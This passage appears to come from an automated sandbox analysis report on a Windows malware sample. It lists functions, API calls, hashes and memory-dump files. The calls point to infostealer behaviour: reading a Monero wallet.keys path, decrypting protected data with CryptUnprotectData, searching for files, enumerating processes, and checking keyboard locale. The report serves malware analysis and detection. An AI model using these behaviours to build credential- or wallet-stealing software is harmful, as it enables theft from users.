                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /"*$0%?w$T2};$[~v$v%-$GW$d/?$Q/
                  • API String ID: 0-3688660224
                  • Opcode ID: e09c76b4bebb84cd6111deb79cd85da9f95b68e4a8ca9cde2e1ede53df7c4e6c
                  • Instruction ID: b2bc72e528d5cd51c1ef1325ce70f818aeb22614ade0adbe1ff63ed0ad093c97
                  • Opcode Fuzzy Hash: e09c76b4bebb84cd6111deb79cd85da9f95b68e4a8ca9cde2e1ede53df7c4e6c
                  • Instruction Fuzzy Hash: D0B207F39082049FE304AE2DDC8567AF7E9EF94720F1A893DE6C4C3744EA3598458697
                  Function 00637B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,006405AF), ref: 00637BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00637BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00637C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00637C62
                  • LocalFree.KERNEL32(00000000), ref: 00637D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 497d4b73609cec96067bd9d3d7aa01215acb43ee3b58ea073edebc1a193b568f
                  • Instruction ID: 901514fe5cb8e2b2e54eed2fb2aacbb94ee4dd69148b5b9f62ea5d4029cc8f63
                  • Opcode Fuzzy Hash: 497d4b73609cec96067bd9d3d7aa01215acb43ee3b58ea073edebc1a193b568f
                  • Instruction Fuzzy Hash: 91416CB1940218ABDB64DB94DC89BEEB3B9FF44700F2041D9E00962281DB742F86CFA5
                  Function 009EEABA Relevance: 10.4, Strings: 7, Instructions: 1681COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: fR$4[_$J>~$N>~$PW{$PW{$v]}
                  • API String ID: 0-553278925
                  • Opcode ID: fc2a696fbad44a95269baef1fcb30438659ef67a7362b57db15b82f31cd13367
                  • Instruction ID: 8bd50c992b5a36558757ad1fb57b8f701f8953827413fcd568b9e6e0f4e38ed6
                  • Opcode Fuzzy Hash: fc2a696fbad44a95269baef1fcb30438659ef67a7362b57db15b82f31cd13367
                  • Instruction Fuzzy Hash: 9EB27CF3A0C2109FD3046E2DEC8567ABBE9EFD4320F1A463DEAC4C7744E93598058696
                  Function 009E7E6D Relevance: 10.3, Strings: 7, Instructions: 1581COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +[_u$<V~^$G1[$d7d+$l{z7$nL[7$wg
                  • API String ID: 0-1278952501
                  • Opcode ID: 87f93bbf8b777cab117bc2fa3de4c4f39a929fa69c823380993adbd25c7e4a46
                  • Instruction ID: 8c32e1676410cd85a51da9027073898deb113deab6f20b610894924fd6ab3330
                  • Opcode Fuzzy Hash: 87f93bbf8b777cab117bc2fa3de4c4f39a929fa69c823380993adbd25c7e4a46
                  • Instruction Fuzzy Hash: F8B227F39082049FE3046E2DEC8567AFBE9EF94720F1A493DEAC4D3744EA3558058697
                  Function 0062E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00640D73), ref: 0062E4A2
                  • StrCmpCA.SHLWAPI(?,006414F8), ref: 0062E4F2
                  • StrCmpCA.SHLWAPI(?,006414FC), ref: 0062E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 9e28656e185c85ac50df2ad7a7281ee6138f9b182eb5ca5a87187f701074b338
                  • Instruction ID: 426d3121dde3ffac4963552037e967eb15004a146d0829d8ea2a4ccffd765f29
                  • Opcode Fuzzy Hash: 9e28656e185c85ac50df2ad7a7281ee6138f9b182eb5ca5a87187f701074b338
                  • Instruction Fuzzy Hash: 5812B272910118ABDB58FBA0DC96EED733AAF54300F4041ACB54AA6191EF306F49DFD6
                  Function 00629AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                  • LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID: Nb
                  • API String ID: 4291131564-695727715
                  • Opcode ID: f618bf82f1ecf21b805bf2df6be17b7d5ad1b7dbaa83d5c023e14fc9b8458089
                  • Instruction ID: 24617564107337e6753dc951c18f0eb380cf0767159d1846c51cacbd0f9fa330
                  • Opcode Fuzzy Hash: f618bf82f1ecf21b805bf2df6be17b7d5ad1b7dbaa83d5c023e14fc9b8458089
                  • Instruction Fuzzy Hash: FA11A2B4240208AFEB14CFA4DC95FAA77B5FB89701F208058F9159B390C7B6A901DFA0
                  Function 0062C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0062C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0062C87C
                  • lstrcat.KERNEL32(?,00640B46), ref: 0062C943
                  • lstrcat.KERNEL32(?,00640B47), ref: 0062C957
                  • lstrcat.KERNEL32(?,00640B4E), ref: 0062C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: dd2435ba842f08e37bc39077c8cf4502df75a9980935fdc696dcf4e655535911
                  • Instruction ID: 2eb78101319461c26e605136bd4c2524585e67a0918929ce6e3bc6619f49306f
                  • Opcode Fuzzy Hash: dd2435ba842f08e37bc39077c8cf4502df75a9980935fdc696dcf4e655535911
                  • Instruction Fuzzy Hash: E64151B5D0421ADBDB14DF94DD89BEEB7B9BB44304F1041A8E609B7280D7719A84CF91
                  Function 00636920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0063696C
                  • sscanf.NTDLL ref: 00636999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006369B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006369C0
                  • ExitProcess.KERNEL32 ref: 006369DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 395415c54b4008f49117bfdf63aecf741e0cfa4d52dcea60fab69bafbae7c61c
                  • Instruction ID: 11b60990769327a614292fa8f971b25b55c5c61d7eebf512c6155bb228eb779f
                  • Opcode Fuzzy Hash: 395415c54b4008f49117bfdf63aecf741e0cfa4d52dcea60fab69bafbae7c61c
                  • Instruction Fuzzy Hash: 4A21EB75D10209ABCF08EFE4D945AEEB7B6BF48300F04852EE406F3250EB745604CBA9
                  Function 00627240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0062724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00627254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00627281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006272A4
                  • LocalFree.KERNEL32(?), ref: 006272AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 75605f9d733640ba34ac3ba6dfc34ba035766ead3bf92d021ce62121c61c7d52
                  • Instruction ID: a9fa8d55ae8a783c9316eb70e75e1a550d0b20d4d095043a4f8d0b54e12a4faf
                  • Opcode Fuzzy Hash: 75605f9d733640ba34ac3ba6dfc34ba035766ead3bf92d021ce62121c61c7d52
                  • Instruction Fuzzy Hash: 7A010CB5A40208BBEB14DFD4DD4AF9E77B9BB44B05F114158FB05BB2C0D6B0AA018F65
                  Function 00639600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0063961E
                  • Process32First.KERNEL32(00640ACA,00000128), ref: 00639632
                  • Process32Next.KERNEL32(00640ACA,00000128), ref: 00639647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0063965C
                  • CloseHandle.KERNEL32(00640ACA), ref: 0063967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 9e310624343e758d97e90415f050ce492a7da18dbf95a4abcf4580c17b742871
                  • Instruction ID: f790988bea492deba1cb4a3cfc53258779ee0e7a8c0de9887bd9f50c44769f6f
                  • Opcode Fuzzy Hash: 9e310624343e758d97e90415f050ce492a7da18dbf95a4abcf4580c17b742871
                  • Instruction Fuzzy Hash: 7D011E75A01208EBDB14DFA5CD89BEDB7F9FB49700F104198E909A7250D7B4AB40DFA1
                  Function 009EB51F Relevance: 6.6, Strings: 4, Instructions: 1649COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Qoj$\R~$}-]{$c<J
                  • API String ID: 0-389944241
                  • Opcode ID: a673242ff234585e5a28440208944c60f8bb66207bb09f1d2bffe481393c2d1b
                  • Instruction ID: 1e1cf828290a7c713959a6f3cb30c8600c0d204e7f22a6c0112bc0ad1db795eb
                  • Opcode Fuzzy Hash: a673242ff234585e5a28440208944c60f8bb66207bb09f1d2bffe481393c2d1b
                  • Instruction Fuzzy Hash: FCB218F360C2049FD304AE2DEC8567AFBE9EF94720F16893DEAC5C3744EA3558058696
